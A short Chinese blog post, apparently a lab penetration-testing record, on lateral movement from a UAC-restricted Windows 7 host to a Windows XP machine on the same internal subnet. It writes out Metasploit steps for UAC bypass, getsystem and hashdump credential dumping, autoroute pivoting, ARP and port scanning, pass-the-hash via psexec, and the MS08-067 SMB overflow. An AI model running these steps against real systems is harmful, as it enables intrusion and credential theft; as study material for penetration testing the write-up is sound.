内网渗透bypassuac和smb溢出
2024-09-01 11:25:18
对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录
环境大致如下 拥有shell权限的win7(有uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp
先对有权限的win7进行hashdump
显示失败 getsystem一下
还是失败 用msf的模块绕过uac
use exploit/windows/local/bypassuac
set session 1(session1 为我们的win7权限)
此时再进入meterpreter hashdump下 getsystem
可以看到绕过了uac 获得了权限
导出了hash 接下来对和win7同网段的xp进行扫描探测
得到本地子网网段
run get_local_subnets
处于192.168.100.0 子网掩码为255.255.255.0这个网段
run autoroute -s 网段 添加路由 -p 查看已经添加的路由
添加完成后 开始扫描
扫描存活ip
run post/windows/gather/arp_scanner RHOST=网段
发现内网以下存在这些主机 其中192.168.100.5 是目标xp
确定了目标 接下来扫描端口
扫描端口
run axiliary/scanner/portscan/tcp
探测完信息后
可以通过之前抓的hash值 进行hash传递攻击
使用msf 下的exploit/windows/smb/psexec
也可以通过对应服务溢出漏洞 渗透拿到目标xp的权限
开放了smb 使用了ms08_067 溢出成功
最新文章
- 域名扫描工具Fierce
- 【转】asp.net(c#)加密解密算法之sha1、md5、des、aes实现源码详解
- Linux文件的建立、复制、删除和移动命令
- Entity Framework 5.0系列之约定配置
- 九度OJ 1201 二叉排序树
- iOS内购的订单对应和补单
- Eclipse常用快捷键大全
- 【Weblogic】linux下weblogic新建domain(入门教程)
- poj 2142 The Balance
- android 开发设计模式---单例模式
- RabbitMQ channel 参数详解
- 上传代码到github的步骤
- java基础知识学习--------之枚举类型(1)
- 我们为何放弃Eclipse,投奔IntelliJ IDEA
- STRTOK函数和STRTOK_R函数
- vue--拖动排序
- Ruby环境配置
- 不同版本Lua介绍
- jquery的get()方法
- Determining the Size of a Class Object---sizeof(class)---By Girish Shetty